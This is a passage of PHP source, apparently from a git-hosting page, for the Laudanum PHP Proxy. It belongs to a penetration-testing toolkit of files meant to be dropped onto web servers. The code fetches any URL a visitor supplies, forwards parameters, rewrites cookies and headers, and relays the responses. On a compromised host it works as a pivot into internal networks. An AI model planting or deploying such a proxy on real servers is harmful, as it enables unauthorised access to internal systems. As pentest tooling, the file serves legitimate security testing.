<h1>Laudanum PHP Proxy</h1>
|
||||
|
||||
<form method="GET" name="proxy">
|
||||
<input type="text" name="laudurl" size="70">
|
||||
|
||||
</form>
|
||||
<hr>
|
||||
<address>
|
||||
Copyright © 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
|
||||
Written by Tim Medin.<br/>
|
||||
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
|
||||
</address>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
<?php
|
||||
} else {
|
||||
|
||||
$url_c = geturlarray($url);
|
||||
$params = array_merge($_GET, $_POST);
|
||||
|
||||
//don't pass throught the parameter we are using
|
||||
unset($params["laudurl"]);
|
||||
|
||||
//create the query or post parameters
|
||||
$query = http_build_query($params);
|
||||
if ($query != "") {
|
||||
$url_c["query"] = $query;
|
||||
}
|
||||
|
||||
//get the files
|
||||
$fp = fopen(buildurl($url_c), "rb");
|
||||
|
||||
// use the headers, except the response code which is popped off the array
|
||||
$headers = $http_response_header;
|
||||
// pop
|
||||
array_shift($headers);
|
||||
|
||||
// fix cookies
|
||||
$headers = rewritecookies($headers);
|
||||
|
||||
$ctype = getcontenttype($headers);
|
||||
$cencoding = getcontentencoding($headers);
|
||||
|
||||
// we will remove gzip encoding later, but we need to remove the header now
|
||||
// before it is added to the response.
|
||||
if ($cencoding == "gzip")
|
||||
$headers = removeheader("Content-Encoding", $headers);
|
||||
|
||||
// set headers for response to client
|
||||
if (preg_match("/text|image/", $ctype)) {
|
||||
header_remove();
|
||||
// the number of headers can change due to replacement
|
||||
$i = 0;
|
||||
while ($i < count($headers)) {
|
||||
if (strpos($headers[$i], "Set-Cookie:") == false)
|
||||
// replace headers
|
||||
header($headers[$i], true);
|
||||
else
|
||||
// if it is the first cookie, replace all the others. Otherwise add
|
||||
header($headers[$i], false);
|
||||
$i++;
|
||||
}
|
||||
} else {
|
||||
header("Content-Disposition: attachment; filename=" . getfilename($url_c));
|
||||
}
|
||||
|
||||
// get data
|
||||
if (preg_match("/text/",$ctype)) { //text
|
||||
//it is a text format: html, css, js
|
||||
$data = "";
|
||||
while (!feof($fp)) {
|
||||
$data .= fgets($fp, 4096);
|
||||
}
|
||||
|
||||
// uncompress it so it can be rewritten
|
||||
if ($cencoding == "gzip")
|
||||
$data = compatible_gzinflate($data);
|
||||
|
||||
// rewrite all the links and such
|
||||
echo rewrite($data, $url_c);
|
||||
|
||||
} else {
|
||||
// binary format or something similar, let it go through
|
||||
fpassthru($fp);
|
||||
fclose($fp);
|
||||
}
|
||||
}
|
||||
?>
|
||||
|
Loading…
Reference in New Issue
Block a user